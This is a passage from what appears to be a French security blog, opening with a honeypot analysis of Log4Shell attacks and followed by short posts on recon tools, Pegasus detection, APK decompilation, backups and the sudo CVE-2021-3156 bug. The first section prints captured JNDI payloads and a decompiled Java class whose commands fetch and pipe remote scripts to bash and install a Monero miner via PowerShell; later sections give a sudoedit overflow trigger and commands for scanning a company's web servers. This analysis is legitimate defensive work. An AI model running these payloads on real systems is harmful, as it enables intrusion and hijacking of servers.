DN: Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjMuMTcyLjU4LjEzOjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzE2My4xNzIuNTguMTM6ODApfGJhc2g=
 javaClassName: foo

 javaCodeBase: http://195.54.160.x:9999/

 objectClass: javaNamingReference

 javaFactory: ExploitejsLdP24Oo

Il a tenté de faire exécuter des commandes Shell encodées en Base64 sur mon serveur :

(curl -s 195.54.160.x:5874/163.172.58.13:80||wget -q -O- 195.54.160.x:5874/163.172.58.13:80)|bash

Pour multiplier les chances de réussite à son attaque, l'attaquant utilise à la fois la commande "curl" et "wget". Pour mieux identifier ses cibles, il transmet en paramètre d'appel HTTP vers son serveur Web, l'adresse IP et le port du serveur infecté. Cette stratégie est indispensable dès lors que les serveurs attaqués ont des routes de sortie réseau autres que l'adresse IP publique utilisée.

Le serveur de l'attaquant n'injecte aucune commande shell malveillante pour le moment, il est utilisé uniquement pour identifier des cibles vulnérables. Il attaquera probablement dans un second temps dès lors qu'il jugera intéressant d'en extraire du contenu ou d'y injecter une commande shell malveillante.

Je reçois aujourd'hui des attaques quasiment quotidiennement provenant de ce serveur, il est très probable qu'il scanne l'ensemble des plages IPv4 pour se créer un futur botnet de serveurs qu'il exploitera dès qu'il aura décidé de les utiliser ...

La seconde attaque ... Avec un vrai payload !

La seconde attaque reçue est beaucoup plus intéressante. Mon HoneyPot m'a permis de récupérer le Payload malveillant que je me suis empressé de décompiler.

public class Exploit {
    static {
        try {
            String[] stringArray = new String[]{"/bin/bash", "-c", "(wget -qO - http://51.250.x.x/.l/log || curl http://51.250.x.x/.l/log) | sh"};
            if (System.getProperty("os.name").toLowerCase().startsWith("win")) {
                stringArray = new String[]{"powershell", "-w", "hidden", "-c", "(new-object System.Net.WebClient).DownloadFile('http://150.60.x.x:80/wp-content/themes/twentyseventeen/s.cmd', $env:temp + '/s.cmd');start-process -FilePath 's.cmd' -WorkingDirectory $env:tmp"};
                Runtime.getRuntime().exec(stringArray);
                stringArray = new String[]{"powershell", "-w", "hidden", "-c", "(new-object System.Net.WebClient).DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/setup_moneroocean_miner.bat', $env:temp + '/oc.cmd');start-process -FilePath 'oc.cmd' -WorkingDirectory $env:tmp"};
            }
            Runtime runtime = Runtime.getRuntime();
            Process process = runtime.exec(stringArray);
            process.waitFor();
        }
        catch (Exception exception) {
            // empty catch block
        }
    }
}

Le code Java injecté contient une vraie charge nuisible et fonctionne aussi bien sur des serveurs Linux que Windows.
Les scripts malveillants sont récupérés soit de serveur Wordpress exploité ou tout simplement de Github ...

Les scripts Shell téléchargés au travers de cette attaque sont très travaillés.
Leur script d'attaque supprime l'ensemble des autres attaquants avant de s'installer sur le serveur.

Conclusion

Je pensais voir une grosse augmentation de l'usage de cette faille de sécurité par des Botnets ces derniers jours, cela ne semble pas être le cas aujourd'hui au-delà des 3 adresses IP détectées.

Dans la mesure où les IP des attaquants se font très facilement détecter par des WAF (Web Application Firewall) et que leurs IP se font automatiquement bloquer par des solutions comme AbuseIPDB ou Crowdsec, une solution radicale serait tout simplement de mettre en place un parefeu dynamique capable de bloquer l'ensemble des IP malveillantes détectées.
Crowdsec fournit cette liste d'IP malveillantes gratuitement sur la base des sondes de son réseau que vous pouvez utiliser pour renforcer le filtre d'accès à vos serveurs.

Si tu es passionné comme moi de cybersécurité, n'hésite pas à rejoindre le serveur Discord de ce blog. Un canal #Cybersecurité a été créé et est ouvert à tous et à toutes.

N'hésite pas non plus à aller faire un tour sur la présentation de Shodan ou de Portsentry.

Vous cherchez à récupérer la liste des IP publiques d'une entreprise facilement ?

NetblockTool est un outil Opensource qui permet de récolter en quelques secondes l'ensemble des plages IP appartenant à une entreprise.

Les données récupérées par le script proviennent de différentes sources d'information : les API ARIN, des recherches sur le portail ARIN et du "dorking" Google.

? Comment s'installe l'outil NetblockTool ?

L'outil NetblockTool n'est pas disponible sous forme de package Linux, l'installation de celui-ci se fait en quelques secondes grâce à Git et fonctionne très bien depuis un Kali Linux sous WSL2.

$ git clone https://github.com/NetSPI/NetblockTool.git
$ cd NetblockTool && pip3 install -r requirements.txt
$ python3 NetblockTool.py -v Company

Son usage est très simple et prend par défaut le nom de l'entreprise que vous souhaitez analyser.

$ python NetblockTool.py -v NomDeLentreprise

Le résultat de la commande produira un fichier CSV portant le nom de l'entreprise recherchée. Ce fichier contiendra l'ensemble des adresses plages d'IP appartenant à l'entreprise ciblée.

Pour extraire la liste des IP générées dans le rapport produit, la commande suivante permet de générer un fichier texte contenant uniquement les plages d'IP trouvées :

cat company.csv | sed '1d' | cut -d, -f1 > ipranges.txt

? Comment scanner rapidement toutes les IP d'une entreprise ?

Il est ensuite possible d'identifier très facilement tous les services exposés par une entreprise sur Internet, la solution la plus simple est d'utiliser l'outil Masscan qui permet de scanner des ports sur de nombreuses IP dans un temps record.

Voici à titre d'exemple la commande Masscan qui permettra d'identifier l'ensemble des serveurs Web d'une entreprise sur la base du fichier "ipranges.txt" produit précédemment.

sudo masscan -iL ipranges.txt -p80,443 > result.txt

Le fichier "result.txt" contiendra l'ensemble des IP hébergeant un serveur Web sur le port 80 ou 443. Vous pourrez ensuite mener une analyse plus approfondie sur les IP de ce fichier et identifier des failles de sécurité de ces différents serveurs.

Cet article permet de démontrer qu'il est possible en 3 lignes de commandes Linux d'identifier l'ensemble des serveurs Web d'une entreprise.
Ces analyses Masscan se complexifient dès lors que des plages IPV6 sont retournées par NetblockTool. Les plages dépassent généralement la capacité maximum de scan de Masscan.

J'espère que vous avez trouvé cet article utile, n'hésitez pas à rejoindre le Discord Geeek pour échanger sur la cybersécurité et poser vos questions relatives à la lecture de cet article.

Les logiciels d'espionnage pour Smartphone sont devenus assez courants sur la toile. Cela est d'autant plus vrai sur la plateforme Android qui offre des privilèges plus élevés et des capacités de simulation d'applications plus importantes (background app, broadcast ...).

Pour lutter contre l'espionnage et défendre la liberté, Amnesty International maintient un référentiel d'empreintes de logiciels espions sur GitHub visant principalement le logiciel Pegasus du NSO Group qui est considéré comme un risque important contre la liberté.

On estime que le logiciel Pegasus permet d'espionner pas moins de 50 000 smartphones autour du globe et 1 000 smartphones en France. Le coût d'entrée de ce logiciel espion serait de 25 000€ par Smartphone si l'on croit les informations trouvées sur la toile et l'installation du logiciel espion serait à priori possible à distance au travers de l'exploitation de failles de type Zero-day ne necessitant aucune interaction humaine de la personne visée. Un simple MMS par exemple peut permettre d'infecter un Smartphone Android ou iOS à distance.

Comment analyser la présence de Pegasus sur votre Smartphone ?

Pour savoir si votre smartphone est espionné par Pegasus, un logiciel Opensource développé en Python au nom de MVT pour Mobile Verification Toolkit permet d'analyser la présence de traces soit sur une sauvegarde de votre téléphone ou soit sur le système de votre téléphone si vous l'avez Jailbreaké.

Pour utiliser MVT de manière simple, il vous suffit d'installer l'outil puis ensuite, de lancer une analyse sur l'une des sauvegardes de votre smartphone Android ou iOS. L'option Jailbreak n'est pas recommandée sauf si vous savez exactement ce que vous faites.

Comment analyser la présence de Pegasus grâce à une sauvegarde d'iPhone ?

Pour analyser mon iPhone depuis mon PC, j'ai tout simplement installé iTunes pour capturer une sauvegarde de mon iPhone sur mon PC.

Une fois la sauvegarde réalisée, j'ai installé MVT sur mon Kali Linux WSL2 sur mon PC sous Windows.

$ sudo apt install python3 python3-pip libusb-1.0-0 sqlite3
$ pip3 install mvt

La première commande consiste à déchiffrer la sauvegarde du terminal avec la commande suivante.

$ cd /mnt/c/Users/MON-USER/Apple/MobileSync/Backup/
$ mvt-ios decrypt-backup -d  ./decrypted  ./00000-IDENTIFIANT-DU-BACKUP

L'outil prend deux arguments en paramètre :

• Le premier derrière l'option "-d" permet de préciser le répertoire où les données doivent être déchiffrées.
• Le second argument permet de préciser le nom de la sauvegarde à déchiffrer. Après avoir lancé la commande, l'outil MVT vous demandera le mot de passe de déchiffrement du backup de votre iPhone.

Installez ensuite la base de connaissances IOCS partagée par Amnesty International pour identifier la trace d'une présence de Pegasus sur votre iPhone.

$ git clone https://github.com/AmnestyTech/investigations.git

Une fois le déchiffrement de la sauvegarde réalisé, l'analyse des traces est possible au travers de la commande suivante :

mvt-ios check-backup --iocs ./investigations/2021-07-18_nso/pegasus.stix2 --output ./result ./decrypted/

Le répertoire indiqué par l'option "--output" permet de préciser dans quel endroit stocker les résultats de l'analyse.

Dans l'exemple ci-dessus, mon analyse se base sur le dernier fichier Stix partagé par Amnesty International qui date de juillet 2021.

Quels sont les fichiers produits par MVT ?

Le script Pyhton MVT va extraire une synthèse des données personnelles stockées dans le backup et tenter de trouver des patterns de la présence d'une infection.

Voici à titre d'exemple les données que MVT a réussi à produire sur la base d'un backup iOS.

L'exhaustivité des données extraites par l'outil est disponible sur la documentation en ligne du logiciel MVT.

Si l'un des fichiers extraits contient une trace pouvant confirmer la présence du logiciel Pegasus, le fichier JSON contenant la trace est suffixé par "_detected".

Si votre Smartphone est infecté, le meilleur moyen pour faire avancer les analyses est de contacter Amnesty International pour capturer des traces et améliorer les fichiers Stix mis à disposition.

Malheuresement, le NSO Group avance probablement plus vite que les empreintes partagées par Amnesty International. L'analyse faite par le logiciel MVT avec les derniers fichiers STIX d'Amnesty International est probablement pas 100% fiable, mais il a comme avantage d'exister et d'être maintenu à jour avec les dernières analyses d'attaques connues.

En savoir plus sur le logiciel d'espionnage Pegasus

• Lire l'article très complet de CitizenLab décrivant le logiciel Pegasus.
• Lire l'article d'Amnesty International sur le data leak Pegasus
• Découvrir le portail "digitalviolence" pour découvrir les impacts du logiciel Pegasus.

C'est au travers d'une vidéo sur Youtube publiée par Tech2tech que j'ai découvert la solution Opensource AdGuard Home qui permet de résoudre des problématiques de filtrage parental rapidement à l'échelle d'un réseau informatique domestique. Il s'agit d'une alternative intéressante au logiciel Opensource Pi-Hole que vous connaissez peut-être déjà.

? Comment fonctionne AdGuard Home ?

AdGuard Home est ni plus ni moins qu'un serveur DNS configurable capable de filtrer des requêtes DNS dès lors que celles-ci sont jugées comme dangereuses ou contenant des contenus à caractère sexuel.

Pour cela AdGuard Home s'appuie sur des listes de domaines mises à jour assez régulièrement et pouvant être enrichies par des listes communautaires tierces.

? Combien coûte le logiciel AdGuard Home ?

Le logiciel est complètement gratuit et son code est disponible sur GitHub.
Il possède pas moins de 8500 étoiles sur GitHub et plus de 50 Millions d'images docker téléchargées depuis Docker Hub.

? Comment installer AdGuard Home ?

Si vous avez un NAS Synology, AdGuard Home est disponible sous forme d'une image Docker très facilement installable. Si vous débutez sous Docker, Cachem a partagé un tutoriel sur son site et vous trouverez aussi une vidéo de Tech2Tech dédiée à l'installation d'AdGuard sur un NAS Synology.

Vous devrez juste être vigilant dans la configuration des montages disques pour permettre de persister les données de l'image.

Si vous n'avez pas de NAS Synology, vous pouvez tout simplement utiliser une machine sous Linux et installer le logiciel, sinon déployer l'image Docker d'AdGuard Home disponible sur le Docker Hub si vous êtes à l'aise avec Docker.

Une fois AdGuard Home installé, vous devrez modifier la configuration de votre serveur DHCP et remplacer l'adresse du DNS par celui d'AdGuard pour que le filtrage prenne effet. Ainsi toutes les demandes de résolution de noms DNS passeront par AdGuard Home et seront filtrées si nécessaire.

✅ Comment se configure AdGuard Home ?

Une fois AdGuard Home installé, un portail Web moderne vous permet de configurer l'ensemble de ses fonctionnalités et de superviser l'ensemble des blocages opérés par cette solution de protection.

Vous pourrez en un clin d'oeil identifier types de blocage réalisé: Publicité, Malware et contenu adulte.
AdGuard Home propose de consolider des statistiques sur 24h, vous pouvez revoir ce paramètre pour consolider des statistiques sur 7,30 ou 90 jours tout comme le journal des requêtes DNS.

? Quelles sont les limites d'AdGuard ?

AdGuard Home est un serveur DNS capable de résoudre des noms de domaine en adresse IP, AdGuard Home n'est pas capable d'analyser le contenu des flux réseau et de décider de bloquer le flux si jamais celui-ci contient vraiment des contenus inadaptés (cf : image transmise par un email, images d'un forum ...).
Il faudra donc être conscient qu'il s'agit d'un filtre de domaines uniquement sur des contenus connus et préanalysés par AdGuard.

Enfin, la protection d'AdGuard Home se limite uniquement aux périphériques connectés à votre réseau local et ne fonctionnera pas dès lors que vos terminaux basculent en 4G.

Il existe cependant, pour les terminaux iOS la possibilité de créer un profil de sécurité obligeant l'utilisation d'une connexion VPN pour les utilisateurs. Cette astuce pourrait permettre de protéger des terminaux iOS connectés en 4G, à condition d'avoir la fibre à votre domicile ...

En Conclusion

AdGuard est une solution intéressante pour protéger votre réseau domestique des sites Internet sur lesquels vous ne souhaitez pas que vos enfants tombent.

Des fonctionnalités de "Toggle" complètent la protection en permettant à tout moment de bloquer un service Web comme Facebook, TikTok ... Cela est pratique si vous souhaitez interdire l'utilisation de certains réseaux sociaux non adaptés.

Bref, l'essayer c'est l'adopter !

Je vous avais présenté il y a quelque temps la création de tunnels SSH avec un transfert de port dynamique permettant de surfer via l'utilisation d'un proxy Sock depuis votre navigateur.

Il s'agit d'une astuce est bien utile pour administrer des serveurs Web d'un réseau privé depuis une simple connexion SSH ou pour tout simplement rebondir sur le Web depuis l'IP du serveur distant afin d'accéder à des services non disponibles depuis son pays par exemple.

Cependant, tous les logiciels ne supportent pas forcément les proxys Socks. Certains ne supportent que les proxys de type HTTP, rendant inutilisable le transfert de port SSH dynamique.

Pour répondre à cette problématique, j'ai trouvé un logiciel Opensource disponible sur GitHub permettant de créer rapidement un proxy HTTP en façade d'un proxy Socks : http-proxy-to-socks ou hpts.

Son fonctionnement est simple, vous créez un transfert de port dynamique en local grâce à une simple commande SSH suivante :

$ ssh -D 9999 monserver

Vous pouvez aussi créer ce transfert de port dynamique via Putty dans l'onglet "Connection -> SSH -> Tunnels".

Vous lancez la commande 'hpts' après l'avoir installé http-proxy-to-socks pour lancer un proxy HTTP en façade de votre proxy Socks :

$ hpts -s 127.0.0.1:9999 -p 8080

Vous avez désormais un proxy HTTP fonctionnel sur le port 8080 de votre PC qui permettra à tous vos logiciels ne supportant pas les proxys Socks de fonctionner correctement.

Pour utiliser ce proxy HTTP, vous devrez simplement saisir l'adresse "http://localhost:8080" comme adresse de proxy sur vos outils préférés.

Vous le savez peut-être, les applications Android sont très simples à analyser afin de comprendre leur fonctionnement interne. La raison ? Le code embarqué est un code interprété par une machine virtuelle, ce qui signifie que la rétro-ingénierie permet de produire du code lisible par un humain, à contrario du code assembleur, qui peut être fastidieux à comprendre dans le cadre d'une application moderne.

Quel outil utiliser pour analyser un APK ?

L'outil le plus simple que j'ai trouvé actuellement pour décompiler une application Android est JADX.
Il s'agit d'un logiciel Opensource disponible sur GitHub et disponible en standard sous forme de paquet sur Kali Linux disponible sur Windows avec WSL2.

Son interface graphique permet en un clic de découvrir l'ensemble de la structure du code de l'application.
C'est après avoir cliqué sur la classe à analyser que l'outil génère du code Java à la volée.

Comment télécharger un APK ?

Un APK est une version compilée et packagée d'une application Android. Les APK sont les fichiers que votre Smartphone télécharge quand vous installez une nouvelle application depuis un magasin d'application.

Les APK peuvent être facilement téléchargeables depuis des sites comme ApkPure par exemple. Ces sites proposent en libre téléchargement les APK de la majorité des applications disponibles sur les magasins d'application officiels.

Vous pouvez bien sûr tester cet outil sur votre propre application.

Est-ce que le reverse engineering est légal en France ?

Le reverse enginering de code est protégé en France par l'article L122-6-1 afin de permettre l'interopérabilité de logiciels.

Au-delà d'un besoin d'interopérabilité, il est interdit de réaliser ce type de pratique sur des logiciels dont vous n'êtes pas l'auteur.

Comment modifier le code d'un APK ?

Il existe à ma connaissance deux possibilités :

• Générer un projet complètement vierge via l'export "Gradle" proposé par Jadx. Mais attention, certaines classes peuvent provoquer des erreurs dans Jadx. Vous ne serez pas certain sur une application complexe d'obtenir l'exhaustivité du code source vous permettant de régénérer une application neuve.

• L'autre alternative est de modifier le code source via un format Smali, un format de code moins lisible que le Java mais facilement modifiable sans devoir recompiler l'ensemble de l'application.

Dans les deux cas, l'application produite devra être signée avec votre certificat de développement pour pouvoir fonctionner sur un terminal Android.

Qu'est-ce que cela signifie pour la sécurité des applications Android ?

Si vous comptiez cacher des choses dans votre code : clef d'API, URL ... Sachez que ces éléments sont ouverts à tout pirate informatique qui peut s'intéresser la sécurité de l'application mobile.

Voici quelques recommandations :

• Offusquer le code de vos applications avec des logiciels comme Proguard par exemple. Mais attention quand votre application crashera, il ne sera pas forcement évident de comprendre l'origine du crash ...
• Ne stockez aucune donnée sensible dans votre application : Clef d'API, mot de passe ... Ces éléments de sécurité sont très simples à trouver depuis du code décompilé.

En conclusion

J'espère que cet article vous aura été instructif. N'oubliez pas que le code d'une application Android n'est pas quelque chose de protégé par défaut, une grande majorité d'entre elles sur les stores n'ont pas de code offusqué et peuvent dévoiler leurs secrets à des développeurs malicieux.

Suite à l'incendie majeur dans le datacenter d'OVH qui a détruit de nombreuses données, voici une petite astuce pour rapatrier de manière automatisée les sauvegardes de vos serveurs à votre domicile sur votre NAS Synology.

Cet incident produit chez OVH a remis en question les idées reçues sur la sécurité des données d'un Datacenter. Un certain nombre de clients qui n'ont pas géoredondé leurs sauvegardes ont un risque important d'avoir perdu les données de leurs serveurs dans la mesure où l'incident à la fois détruit les serveurs, mais les sauvegardes qui étaient stockées dans le même Datacenter ...

Plus vous multipliez le type de support de vos sauvegardes, plus vous diminuez le risque de perdre vos données. L'utilisation de votre NAS vous assure le contrôle des données, mais ne vous prémunit en rien un incident majeur : vol du NAS, incendie. Il permet de géoredonder votre sauvegarde et de limiter les risques de pertes de données si votre serveur part en fumée avec sa sauvegarde primaire.

? Créez un backup de votre serveur

Avant de pouvoir rapatrier les sauvegardes de vos serveurs sur notre serveur Synology NAS, il est nécessaire que vos serveurs soient sauvegardés avec un outil comme Backup Manager que je vous avais présenté il y a plus d'une décennie déjà.

Une fois que votre serveur produit correctement des archives prêtes à être récupérées. L'idée est de créer une tâche planifiée sur un NAS Synology pour que le backup soit automatiquement récupéré de manière quotidienne.

? Créez une tâche planifiée de sauvegarde sur un NAS Synology

Le planifier de tâches est accessible depuis l'outil de gestion de configuration du NAS synology.

Ajoutez une tâche en cliquant sur le bouton créer. Vous devrez ensuite saisir le nom de la tâche, son heure d'exécution et enfin les lignes de commande Linux à exécuter.

Dans mon cas, la sauvegarde de mon serveur est disponible dans un serveur FTP hébergé dans le même Datacenter que mon serveur, j'ai donc tout simplement utilisé la commande Wget pour récupérer l'archive depuis mon NAS.

# Je supprime toutes les anciennes archives de sauvegarde de plus de 1 an
$find /volume01/backup/* -mtime +365 -exec rm {} \;

# Je génére une variable avec le jour 
$export DIRPATH = $(date +"%Y-%m-%d");

# Je recopie tous les fichiers disponibles dans le serveur FTP de mon serveur sur un répertoire dédié de mon NAS synology
$wget -m ftp://user:password@mon-serveur/* -P /volume01/backup/$DIRPATH/

En conclusion

Une fois cette tâche mise en route, votre serveur NAS stockera à fréquence constante les sauvegardes de votre serveur.

Si vos disques le permettent, vous pourrez garder ainsi une profondeur d'historique importante vous permettant en cas d'incident de restaurer des sauvegardes anciennes.

Enfin, si vous souhaitez renforcer la sécurité de votre NAS Synology, je vous conseille d'aller jeter un coup d'oeil sur mon précédent article sur le sujet.

Bonnes sauvegardes !

Si Sherlock Holmes vivait à l'époque d'Internet, l'outil Sherlock présenté dans cet article lui aurait probablement servi à plusieurs reprises sur ses affaires de détective.

Sherlock est un outil développé en Python capable de découvrir la présence de comptes utilisés par un pseudonyme sur une majorité de sites Internet: Youtube, Vimeo, Unsplash, Trello ... etc.

Son fonctionnement est très simpliste, mais très efficace. Il peut être utilisé :

• D'une manière malveillante, en vue d'une attaque ciblée par un pirate.
• D'une manière bienveillante, pour éviter le cybersquattage et identifier les faux comptes utilisant votre marque.

Comment installer Sherlock ?

Pour installer cet outil, c'est très simple :

• Soit vous utilisez Kali Linux, dans ce cas un "apt-get install sherlock" vous sera suffisant pour installer cet outil.
• Soit vous utilisez une autre distribution, dans ce cas vous pouvez passer par une installation manuelle de l'outil :

$ git clone https://github.com/sherlock-project/sherlock.git
$ cd sherlock
$ python3 -m pip install -r requirements.txt

Si vous n'avez pas Linux, vous pouvez démarrer gratuitement Sherlock un shell Google via ce lien.

Comment utiliser Sherlock ?

Son usage est très simple, il vous suffit de taper la commande suivante pour rechercher l'ensemble des comptes utilisés par le pseudonyme "user123" :

sherlock user123

ou dans le cas d'une installation sur la base du code source :

python sherlock user123

En conclusion

Cet outil démontre la fragilité de l'utilisation d'un pseudonyme unique sur Internet si vous souhaitez protéger votre vie privée.
L'utilisation d'une chaine aléatoire dans votre pseudonyme est la seule solution pour se protéger de ce type d'outil.

Pour plus d'anonymisation sur ce type d'analyse, Sherlock supporte l'utilisation du réseau Tor pour anonymiser les vérifications.

Enfin, n'oubliez pas de changer de mot de passe sur chaque service Web que vous utilisez. n'hésitez pas à utiliser un gestionnaire de mot de passe comme KeePaasXC pour simplifier gratuitement la gestion de vos mots de passe.

Le projet Sherlock est Opensource est disponible sur GitHub.

Vous souhaitez lister les sous-domaines d'un domaine facilement ? Dnsdumpster est un portail en ligne qui permet d'analyser en quelques secondes les entrées DNS connues d'un nom de domaine Internet.

Les DNS ne permettent pas de lister facilement les sous-domaines d'un domaine principal sauf si celui-ci est mal configuré et ouvre des fonctions de transfert de zone.

Dnsdumpster est un outil en ligne exploitant les résultats de plusieurs plateformes comme Alexa Top 1 Million sites, Search Engines, Common Crawl, Certificate Transparency, Max Mind, Team Cymru, Shodan et scans.io pour en extraire les sous-domaines d'un domaine connu.

C'est à la fois un outil pouvant servir de détection de points d'entrée sur un réseau pour un attaquant, mais c'est aussi un outil pour permettre d'identifier des points d'attaque pour une entreprise.

Pour une plus grande simplicité dans l'analyse des résultats, la plateforme génère un schéma statique et un visuel dynamique permettant de mieux comprendre l'hébergement de l'ensemble des sous-domaines découverts.

Bref, c'est un outil gratuit intéressant à exploiter et qui est à la portée de tous et de toutes.

Si vous avez suivi les dernières actualités, une faille énorme a été découverte sur la commande sudo inférieure à la version 1.9.5p2.

Cette faille a été identifiée sous le doux nom de CVE-2021-3156, ce n’est pas moins la 3156ème faille recensée de l'année 2021 sur le portail CVE (Common Vulnerabilities and Exposures).

Beaucoup de journaux informatiques en parlent, mais savez-vous réellement quelle est l'origine de cette faille de sécurité béante ?

? D'où vient la faille CVE-2021-3156 ?

L'origine de la faille est liée à une mauvaise gestion de l'allocation de la mémoire de la chaine de caractère contenant l'argument de la commande sudo.

La faille n'est pas directement liée à la commande Sudo mais plus précisément à la commande Sudoedit qui possède un comportement légèrement différent de Sudo dans le traitement de son paramètre d'entrée (argc).

L'expert en sécurité s'est rendu compte que Sudo disposait de différents modes de fonctionnement : MODE_EDIT, MODE_SHELL. Dans un certain cas, le caractère '\' est utilisé pour ajouter des paramètres à la ligne de commande passée en paramètre, dans un autre cas, cela ne semble pas être le cas.

Pour autant, si un caractère de ce type est inclus dans la commande alors Sudoedit se trompe dans la taille d'allocation de la mémoire et un buffer overflow se produit tout simplement ...

sudoedit -s '\' `perl -e 'print "A" x 65536'` 
malloc(): corrupted top size 
Aborted (core dumped) 

? Une faille simplement exploitable ?

La faille de sécurité étant facilement exploitable, le nombre d'exploits explose sur le Web, on recense pas moins d'une quarantaine d'exploits disponibles sur GitHub.

L'exploit le plus connu semble est le "Baron Samedit" présenté dans la vidéo de Qualys et qui est disponible sur Exploit Database.

? Quel est le risque pour votre serveur ?

Cette faille ne permet pas à une personne à distante d'attaquer un serveur, mais à une personne ayant des droits d'utilisateurs d'acquérir les droits "root" sur un serveur.

Si vous voulez rentrer plus en profondeur dans l'explication de la faille et le code de Sudoedit qui a permis d'identifier ce buffer overflow, n'hésitez pas à faire un tour sur le blog de Qualys.

N'oubliez pas de mettre à jour dès à présent vos serveurs Linux avec une version de Sudo supérieure ou égal à la version 1.9.5p2 !

Vous cherchez un moyen pour éduquer vos enfants sur le bon usage réseaux sociaux ? L'école des Réseaux Sociaux est un projet européen à but non lucratif opéré par eduPad en partenariat avec European Schoolnet qui a comme objectif d'aider nos enfants à mieux comprendre les principaux risques qui se cachent derrières ces réseaux.

Le concept de l'école des réseaux sociaux est assez simple, un chatbot capable de prendre l'identité de différents personnages virtuels échange avec votre enfant sous forme de messagerie interposée. En fonction des bonnes et des mauvaises décisions prises par votre enfant, des explications lui permettront de mieux comprendre les risques et de gagner des cartes virtuelles dès que les concepts sont compris.

Le projet l’École des Réseaux Sociaux est lauréat du Google.org Impact Challenge 2019 pour rendre l’internet plus sûr pour tout le monde

La plateforme ne milite pas pour l'interdiction de l'usage de ces réseaux, mais pour une éducation positive sur l'usage de ces outils.

Le site dispose aussi de nombreux modules de formation téléchargeables pour les parents et les enseignants.

Je vous invite à aller faire un tour sur le site et à en parler aux enseignants et parents qui peuvent être à la recherche de fiches éducatives sur le sujet.

L'école des Réseaux Sociaux est une belle initiative qui mérite d'être connue !

Je vous avais partagé dans un précédent article la disponibilité de 4 éditions gratuites de Misc, Linux Magazine, Hackable, Linux Pratique par les éditions Diamond.

Cette fois, c'est au Virus Informatique de distribuer sous licence de libre diffusion la version 44 de son journal suite à la faillite de son ancien éditeur et au succès de son financement collaboratif sur Ulule.

http://acbm.com/virus/num_44/VirusInfo44.pdf

Le Virus Informatique, c'est un peu le dinosaure de la presse informatique en France. Édité par la société ACBM créée en 1997, ce journal a plus de 20 années derrière lui. Malgré un arrêt des publications entre 2004 et 2016, celui-ci a repris ses diffusions en kiosque et à retrouvé sa communauté de lecteurs passionnés.

Commercialisé au prix de 2€ et sans publicité, le Virus informatique s'adresse à des lecteurs pointus en informatique. Ces articles techniques et très critiques forment une source d'information alternative à la presse classique.

Les Bellaminettes de Bruno Bellamy continuent à égayer ce journal, elles constituent une grande part de l'ADN du Virus informatique. Sans Bellaminette, le Virus informatique perdrait de son charme !

Une partie des articles du Virus sont distribués sur le site Internet d'ACBM sous licence Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License.

Le double numéro 44/45 est disponible en kiosque.

Bonne lecture !

La mise en place du chiffrement sur un serveur Web peut être parfois assez complexe en fonction du niveau de sécurité que vous souhaitez atteindre tout en prenant en compte la compatibilité avec les différents navigateurs et terminaux du marché.

Pour tester que votre serveur possède une configuration correcte, deux options s'offrent à vous :

• Dans le cas le plus simple, votre serveur possède déjà une entrée DNS publique, vous pourrez tout simplement utiliser le site SSLLabs pour vérifier la configuration de celui-ci. Une note de A est assez facilement atteignable en suivant les recommandations de safeciphers.

• Dans le cas contraire, si le DNS de votre serveur n'est pas encore exposé sur Internet, il faudra utiliser une autre solution : Testssl.sh

Testssl.sh est un script Unix permettant de vérifier la sécurité de votre configuration HTTPS. Il permettra de vous confirmer la compatibilité de votre site avec une exhaustivité de systèmes : Android, IE, Safari, Java ...

Son fonctionnement est très simple !

Réalisez un clone du repository Git du projet :

$ git clone https://github.com/drwetter/testssl.sh
$ cd testssl.sh
$ chmod +x testssl.sh

Lancez une analyse sur le site de votre choix :

./testssl.sh www.geeek.org

Ou bien en précisant vous-même l'IP du serveur si celui-ci n'a pas encore de DNS public :

./testssl.sh --ip 7.8.9.7 www.geeek.org

Si vous utilisez Docker, vous pouvez aussi tout simplement lancer l'image Docker Testssl pour réaliser vos tests :

$ docker run --rm -ti drwetter/testssl.sh

L'outil permet aussi de réaliser un ensemble de tests de sécurité contre des failles connues : Heartbleed, CCS injection, Ticketbleed, Bleichenbacher's Oracle Threat (ROBOT), renegotiation vulnerabilities, CRIME, BREACH, POODLE (SSL), SWEET32 vulnerability, BEAST vulnerability, LUCKY13, FREAK, LOGJAM, DROWN.

Bref, c'est un outil à mettre dans toutes les mains. Il vous permettra d'analyser facilement n'importe quel port utilisant un cipher TLS/SSL.

Dans la famille des outils d'analyse de sites Internet, je vous présente WhatWeb, un outil en ligne de commande disponible sous Linux/WSL capable d'extraire des informations cachées d'un site Internet.

WhatWeb est un projet OpenSource disponible sur GitHub. Son usage est très simple, pour l'utiliser, il suffit de taper la commande "whatweb" accompagnée de l'URL du site à analyser.

WhatWeb est capable de restituer un certain nombre d'informations en fonction des technologies détectées. Il dispose de plus de 1800 plugins capables d'extraire des informations sur le site à analyser.

Par défaut WhatWeb retourne la réponse de l'analyse sur la ligne de commande, si vous souhaitez utiliser WhatWeb de manière industrielle, vous pouvez adosser à WhatWeb une base MongoDB pour stocker l'ensemble des résultats d'analyse de WhatWeb.

En fonction de la profondeur d'analyse que vous souhaitez réaliser, WhatWeb dispose d'un niveau d'agressivité modélisé par le paramètre "a".
Ce niveau d'agressivité va de 1 à 4, 4 étant le mode le plus agressif en terme de requêtes HTTP exécutées pour extraire des informations.

$ whatweb -a 4 www.votre-site.com

WhatWeb est disponible en standard sur la distribution Linux Ubuntu :

$ sudo apt-get install whatweb

Dans la famille des outils d'analyse, vous pouvez aussi regarder du coté de Lynis et Nessus.

Bonne analyse !